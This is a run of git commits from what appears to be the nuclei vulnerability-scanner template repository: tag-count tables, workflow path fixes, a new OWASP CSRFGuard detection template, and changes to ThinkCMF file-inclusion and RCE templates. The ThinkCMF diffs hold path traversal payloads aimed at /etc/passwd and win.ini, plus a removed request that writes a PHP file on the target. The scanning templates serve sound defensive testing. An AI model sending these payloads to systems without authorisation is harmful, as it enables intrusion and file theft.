ntopng | 1 | | | | | | | | | | gitea | 1 | | | | | | | | | -| sage | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | | dbeaver | 1 | | | | | | | | | -| cerebro | 1 | | | | | | | | | -| checkpoint | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| alerta | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| testrail | 1 | | | | | | | | | -| webadmin | 1 | | | | | | | | | -| gloo | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| nedi | 1 | | | | | | | | | -| lanproxy | 1 | | | | | | | | | -| wooyun | 1 | | | | | | | | | -| kyan | 1 | | | | | | | | | -| panasonic | 1 | | | | | | | | | -| cyberoam | 1 | | | | | | | | | -| zenario | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| tor | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| couchbase | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| phpfastcache | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| sql | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| tjws | 1 | | | | | | | | | | comodo | 1 | | | | | | | | | -| sceditor | 1 | | | | | | | | | -| nsasg | 1 | | | | | | | | | -| shiro | 1 | | | | | | | | | -| gstorage | 1 | | | | | | | | | -| st | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| elascticsearch | 1 | | | | | | | | | -| ewebs | 1 | | | | | | | | | -| darkstat | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| frontpage | 1 | | | | | | | | | -| lighttpd | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| graphql | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| actuator | 1 | | | | | | | | | | yachtcontrol | 1 | | | | | | | | | -| exposures | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| terraform | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| motorola | 1 | | | | | | | | | +| cscart | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| api-manager | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| elasticsearch | 1 | | | | | | | | | +| yzmcms | 1 | | | | | | | | | +| omi | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| clockwork | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| s3 | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| luftguitar | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| basic-auth | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| artica | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| rockethchat | 1 | | | | | | | | | +| daybyday | 1 | | | | | | | | | +| nimble | 1 | | | | | | | | | +| oneblog | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| metabase | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| sophos | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| elfinder | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| glowroot | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| frontpage | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| olivetti | 1 | | | | | | | | | +| pihole | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| redmine | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| etherpad | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| smartblog | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | | acontent | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| gstorage | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| gilacms | 1 | | | | | | | | | +| mrtg | 1 | | | | | | | | | +| resourcespace | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| cloudron | 1 | | | | | | | | | +| testrail | 1 | | | | | | | | | +| shoppable | 1 | | | | | | | | | +| woocommerce | 1 | | | | | | | | | +| miscrsoft | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| kindeditor | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| auth | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| websphere | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| vidyo | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| nifi | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| novnc | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| beanstalk | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| cherokee | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| craftcms | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| wondercms | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| shiro | 1 | | | | | | | | | +| xampp | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| pcoip | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| solarlog | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| tracer | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| pmb | 1 | | | | | | | | | +| werkzeug | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| database | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| cyberoam | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| trane | 1 | | | | | | | | | +| elascticsearch | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| influxdb | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| processmaker | 1 | | | | | | | | | +| adb | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| wing-ftp | 1 | | | | | | | | | +| rocketchat | 1 | | | | | | | | | +| burp | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| graphite | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| oidc | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| owa | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| netgenie | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| listserv | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| eyelock | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| ewebs | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| phpshowtime | 1 | | | | | | | | | +| karel | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| gotmls | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| imap | 1 | | | | | | | | | +| lotus | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| gunicorn | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| minimouse | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| ognl | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| tcexam | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | +| myvuehelp | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index f872956ab3..06cc935227 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 803 | daffainfo | 280 | cves | 803 | info | 658 | http | 2065 | -| lfi | 325 | pikpikcu | 276 | vulnerabilities | 312 | high | 620 | file | 46 | +| cve | 803 | daffainfo | 280 | cves | 803 | info | 660 | http | 2067 | +| lfi | 325 | pikpikcu | 277 | vulnerabilities | 312 | high | 620 | file | 46 | | xss | 253 | dhiyaneshdk | 268 | exposed-panels | 250 | medium | 463 | network | 43 | -| panel | 252 | pdteam | 199 | technologies | 197 | critical | 276 | dns | 12 | +| panel | 252 | pdteam | 199 | technologies | 199 | critical | 276 | dns | 12 | | wordpress | 241 | geeknik | 154 | exposures | 188 | low | 154 | | | | exposure | 233 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | | rce | 200 | gy741 | 77 | takeovers | 64 | | | | | -| tech | 188 | pussycat0x | 70 | default-logins | 56 | | | | | -| wp-plugin | 167 | princechaddha | 62 | file | 46 | | | | | +| tech | 190 | pussycat0x | 70 | default-logins | 56 | | | | | +| wp-plugin | 167 | princechaddha | 63 | file | 46 | | | | | | cve2020 | 164 | madrobot | 61 | workflows | 37 | | | | | From 309b53154e3a0d5598b11cdc476e21e8297fe31a Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 30 Sep 2021 18:40:13 +0530 Subject: [PATCH 2634/4083] workflow update --- .github/workflows/templates-stats.yml | 3 --- 1 file changed, 3 deletions(-) diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index 22f43e7261..669b665655 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -1,9 +1,6 @@ name: 🗒 Templates Stats on: - create: - tags: - - v* workflow_dispatch: jobs: From be39b6511b0589eed9b7368ebf53a8a5447db426 Mon Sep 17 00:00:00 2001 From: forgedhallpass <13679401+forgedhallpass@users.noreply.github.com> Date: Thu, 30 Sep 2021 17:08:43 +0300 Subject: [PATCH 2635/4083] OWASP CSRFGuard detection --- technologies/csrfguard-detect.yaml | 71 ++++++++++++++++++++++++++++++ 1 file changed, 71 insertions(+) create mode 100644 technologies/csrfguard-detect.yaml diff --git a/technologies/csrfguard-detect.yaml b/technologies/csrfguard-detect.yaml new file mode 100644 index 0000000000..ed63f98c6e --- /dev/null +++ b/technologies/csrfguard-detect.yaml @@ -0,0 +1,71 @@ +id: csrf-guard-detect + +info: + name: OWASP CSRF Guard detection + author: forgedhallpass + severity: info + description: Detects OWASP CSRF Guard 3.x & 4.x versions and whether token-per-page support is enabled based on default configuration. + reference: + - https://github.com/OWASP/www-project-csrfguard + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + GET /JavaScriptServlet HTTP/1.1 + Host: {{Hostname}} + Referer: {{BaseURL}} + + - | + POST /JavaScriptServlet HTTP/1.1 + Host: {{Hostname}} + OWASP-CSRFTOKEN: {{masterToken}} + + matchers-condition: or + matchers: + - type: word + name: "CSRFGuard version 3.x" + words: + - "FETCH-CSRF-TOKEN" + + - type: word + name: "CSRFGuard version 4.x" + words: + - "masterTokenValue" + + - type: dsl + name: "Token-per-page support is not enabled." + condition: and + dsl: + - 'status_code_3==400' + - 'contains(body, "Token-Per-Page functionality is disabled")' + + - type: dsl + name: "Token-per-page support is enabled." + condition: and + dsl: + - 'status_code_3==200' + - 'contains(body, "{\"pageTokens")' + + cookie-reuse: true + extractors: + - type: regex + name: masterToken + internal: true + group: 1 + regex: + - "(?:masterTokenValue\\s*=\\s*')([^']+)';" + + - type: regex + group: 1 + name: "Master Token" + regex: + - "(?:masterTokenValue\\s*=\\s*')([^']+)';" + + - type: json + name: Page tokens + json: + - '.pageTokens' \ No newline at end of file From 6f6161838bd04d37f1956564afacc8cc1bc8db11 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 Sep 2021 14:10:07 +0000 Subject: [PATCH 2636/4083] Auto README Update [Thu Sep 30 14:10:07 UTC 2021] :robot: --- README.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index 9893583d2f..9eb520c555 100644 --- a/README.md +++ b/README.md @@ -42,15 +42,15 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 803 | daffainfo | 280 | cves | 803 | info | 658 | http | 2065 | -| lfi | 325 | pikpikcu | 276 | vulnerabilities | 312 | high | 620 | file | 46 | +| cve | 803 | daffainfo | 280 | cves | 803 | info | 660 | http | 2067 | +| lfi | 325 | pikpikcu | 277 | vulnerabilities | 312 | high | 620 | file | 46 | | xss | 253 | dhiyaneshdk | 268 | exposed-panels | 250 | medium | 463 | network | 43 | -| panel | 252 | pdteam | 199 | technologies | 197 | critical | 276 | dns | 12 | +| panel | 252 | pdteam | 199 | technologies | 199 | critical | 276 | dns | 12 | | wordpress | 241 | geeknik | 154 | exposures | 188 | low | 154 | | | | exposure | 233 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | | rce | 200 | gy741 | 77 | takeovers | 64 | | | | | -| tech | 188 | pussycat0x | 70 | default-logins | 56 | | | | | -| wp-plugin | 167 | princechaddha | 62 | file | 46 | | | | | +| tech | 190 | pussycat0x | 70 | default-logins | 56 | | | | | +| wp-plugin | 167 | princechaddha | 63 | file | 46 | | | | | | cve2020 | 164 | madrobot | 61 | workflows | 37 | | | | | **166 directories, 2230 files**. From 5ee5fb19a24778c4f4c7898917142cc828f7bb32 Mon Sep 17 00:00:00 2001 From: forgedhallpass <13679401+forgedhallpass@users.noreply.github.com> Date: Thu, 30 Sep 2021 17:16:37 +0300 Subject: [PATCH 2637/4083] Correct template reference to airflow-default-login.yaml from airflow-default-credentials.yaml --- workflows/airflow-workflow.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/workflows/airflow-workflow.yaml b/workflows/airflow-workflow.yaml index 0c7f03ee01..279579869e 100644 --- a/workflows/airflow-workflow.yaml +++ b/workflows/airflow-workflow.yaml @@ -13,5 +13,5 @@ workflows: - template: cves/2020/CVE-2020-13927.yaml - template: exposed-panels/airflow-panel.yaml - template: exposures/configs/airflow-configuration-exposure.yaml - - template: default-logins/apache/airflow-default-credentials.yaml + - template: default-logins/apache/airflow-default-login.yaml - template: misconfiguration/airflow/ \ No newline at end of file From e90e3b49bc673ed631b4b71d91de7ca8bb4ab75e Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 30 Sep 2021 20:22:53 +0530 Subject: [PATCH 2638/4083] Added more unique matchers --- vulnerabilities/thinkcmf/thinkcmf-lfi.yaml | 16 ++++++----- vulnerabilities/thinkcmf/thinkcmf-rce.yaml | 31 +++++++++++----------- 2 files changed, 25 insertions(+), 22 deletions(-) diff --git a/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml b/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml index 6b37ffa8ff..78d8dc35ef 100644 --- a/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml +++ b/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml @@ -6,20 +6,24 @@ info: severity: high reference: https://www.freebuf.com/vuls/217586.html tags: thinkcmf,lfi + metadata: + win-payload: "../../../../../../../../../../../../../../../../windows/win.ini" + unix-payload: "../../../../../../../../../../../../../../../../etc/passwd" requests: - method: GET path: - - "{{BaseURL}}/?a=display&templateFile=../../../../../../../../../../../../../../../../etc/passwd" - - "{{BaseURL}}/?a=display&templateFile=../../../../../../../../../../../../../../../../windows/win.ini" + - "{{BaseURL}}/?a=display&templateFile=README.md" matchers-condition: and matchers: - - type: regex - regex: - - "root:.*:0:0:" - - "bit app support" + - type: word + condition: and + words: + - "ThinkCMF" + - "## README" + - "## UPDATE" - type: status status: diff --git a/vulnerabilities/thinkcmf/thinkcmf-rce.yaml b/vulnerabilities/thinkcmf/thinkcmf-rce.yaml index b3a0c71edd..b7dee6350d 100644 --- a/vulnerabilities/thinkcmf/thinkcmf-rce.yaml +++ b/vulnerabilities/thinkcmf/thinkcmf-rce.yaml @@ -8,21 +8,20 @@ info: tags: thinkcmf,rce requests: - - method: GET - path: - - "{{BaseURL}}/index.php?a=fetch&content=%3C?php+file_put_contents(%22poc.php%22,%22%3C?php+echo+phpinfo()%3B%22)%3B" - - method: GET - path: - - "{{BaseURL}}/poc.php" + - raw: + - | + GET /index.php?a=fetch&content={{url_encode(' Date: Thu, 30 Sep 2021 20:41:48 +0530 Subject: [PATCH 2639/4083] misc update --- technologies/csrfguard-detect.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/technologies/csrfguard-detect.yaml b/technologies/csrfguard-detect.yaml index ed63f98c6e..717dbcbb80 100644 --- a/technologies/csrfguard-detect.yaml +++ b/technologies/csrfguard-detect.yaml @@ -27,24 +27,24 @@ requests: matchers-condition: or matchers: - type: word - name: "CSRFGuard version 3.x" + name: "CSRFGuard-v3.x" words: - "FETCH-CSRF-TOKEN" - type: word - name: "CSRFGuard version 4.x" + name: "CSRFGuard-v4.x" words: - "masterTokenValue" - type: dsl - name: "Token-per-page support is not enabled." + name: "Disabled-token-per-page" condition: and dsl: - 'status_code_3==400' - 'contains(body, "Token-Per-Page functionality is disabled")' - type: dsl - name: "Token-per-page support is enabled." + name: "Enabled-token-per-page" condition: and dsl: - 'status_code_3==200' @@ -61,11 +61,11 @@ requests: - type: regex group: 1 - name: "Master Token" + name: "master-token" regex: - "(?:masterTokenValue\\s*=\\s*')([^']+)';" - type: json - name: Page tokens + name: "page-token" json: - '.pageTokens' \ No newline at end of file From 653a3ac3adbdadb031fa3cf1783ffe9f458fac55 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 30 Sep 2021 20:45:04 +0530 Subject: [PATCH 2640/4083] Added tags --- technologies/csrfguard-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/technologies/csrfguard-detect.yaml b/technologies/csrfguard-detect.yaml index 717dbcbb80..76e49b655e 100644 --- a/technologies/csrfguard-detect.yaml +++ b/technologies/csrfguard-detect.yaml @@ -5,8 +5,8 @@ info: author: forgedhallpass severity: info description: Detects OWASP CSRF Guard 3.x & 4.x versions and whether token-per-page support is enabled based on default configuration. - reference: - - https://github.com/OWASP/www-project-csrfguard + reference: https://github.com/OWASP/www-project-csrfguard + tags: tech,csrfguard requests: - raw: From 0904662e591ae8cba2f44b73bded5fd0fa61322a Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 30 Sep 2021 20:51:24 +0530 Subject: [PATCH 2641/4083] workflow path fixes --- workflows/azkaban-workflow.yaml | 2 +- workflows/micro-focus-workflow.yaml | 2 +- workflows/samsung-wlan-ap-workflow.yaml | 2 +- workflows/solarwinds-orion-workflow.yaml | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/workflows/azkaban-workflow.yaml b/workflows/azkaban-workflow.yaml index 0fb56f4451..8189563b5f 100644 --- a/workflows/azkaban-workflow.yaml +++ b/workflows/azkaban-workflow.yaml @@ -8,4 +8,4 @@ info: workflows: - template: exposed-panels/azkaban-web-client.yaml subtemplates: - - template: default-logins/azkaban/azkaban-web-client-default-creds.yaml + - template: default-logins/azkaban/ diff --git a/workflows/micro-focus-workflow.yaml b/workflows/micro-focus-workflow.yaml index 1aa19b70da..8988990a93 100644 --- a/workflows/micro-focus-workflow.yaml +++ b/workflows/micro-focus-workflow.yaml @@ -6,6 +6,6 @@ info: description: A simple workflow that runs all Micro Focus related nuclei templates on a given target. workflows: - - template: default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml + - template: default-logins/UCMDB/ - template: cves/2020/CVE-2020-11853.yaml - template: cves/2020/CVE-2020-11854.yaml diff --git a/workflows/samsung-wlan-ap-workflow.yaml b/workflows/samsung-wlan-ap-workflow.yaml index 78cfad4255..2d3701e06b 100644 --- a/workflows/samsung-wlan-ap-workflow.yaml +++ b/workflows/samsung-wlan-ap-workflow.yaml @@ -6,5 +6,5 @@ info: description: A simple workflow that runs all samsung WlanAP related nuclei templates on a given target. workflows: - - template: default-logins/samsung/samsung-wlan-ap-default-credentials.yaml + - template: default-logins/samsung/ - template: vulnerabilities/samsung/ \ No newline at end of file diff --git a/workflows/solarwinds-orion-workflow.yaml b/workflows/solarwinds-orion-workflow.yaml index 8596d03e7b..91a513db53 100644 --- a/workflows/solarwinds-orion-workflow.yaml +++ b/workflows/solarwinds-orion-workflow.yaml @@ -10,4 +10,4 @@ workflows: subtemplates: - template: cves/2018/CVE-2018-19386.yaml - template: cves/2020/CVE-2020-10148.yaml - - template: default-logins/solarwinds/solarwinds-default-admin.yaml \ No newline at end of file + - template: default-logins/solarwinds/ \ No newline at end of file From 7191aee57025775b699284d54bc438efa431ffc4 Mon Sep 17 00:00:00 2001 From: Sullo Date: Thu, 30 Sep 2021 12:20:54 -0400 Subject: [PATCH 2642/4083] * Added CVE info & moved simple-employee-rce.yaml to cves/2019/CVE-2019-20183.yaml * Added missing {{Hostname}} to some raw requests (confirmed that hostname is allowed in exploits) * Minor cleanup in the modified plugins --- .../simple-employee-rce.yaml => cves/2019/CVE-2019-20183.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename vulnerabilities/other/simple-employee-rce.yaml => cves/2019/CVE-2019-20183.yaml (100%) diff --git a/vulnerabilities/other/simple-employee-rce.yaml b/cves/2019/CVE-2019-20183.yaml similarity index 100% rename from vulnerabilities/other/simple-employee-rce.yaml rename to cves/2019/CVE-2019-20183.yaml From 66cad3ff35e0d59bf4323c8122af132731e815d8 Mon Sep 17 00:00:00 2001 From: sullo Date: Thu, 30 Sep 2021 12:25:22 -0400 Subject: [PATCH 2643/4083] Revert "* Added CVE info & moved simple-employee-rce.yaml to cves/2019/CVE-2019-20183.yaml" incorrect push to master repo This reverts commit 7191aee57025775b699284d54bc438efa431ffc4. --- .../other/simple-employee-rce.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cves/2019/CVE-2019-20183.yaml => vulnerabilities/other/simple-employee-rce.yaml (100%) diff --git a/cves/2019/CVE-2019-20183.yaml 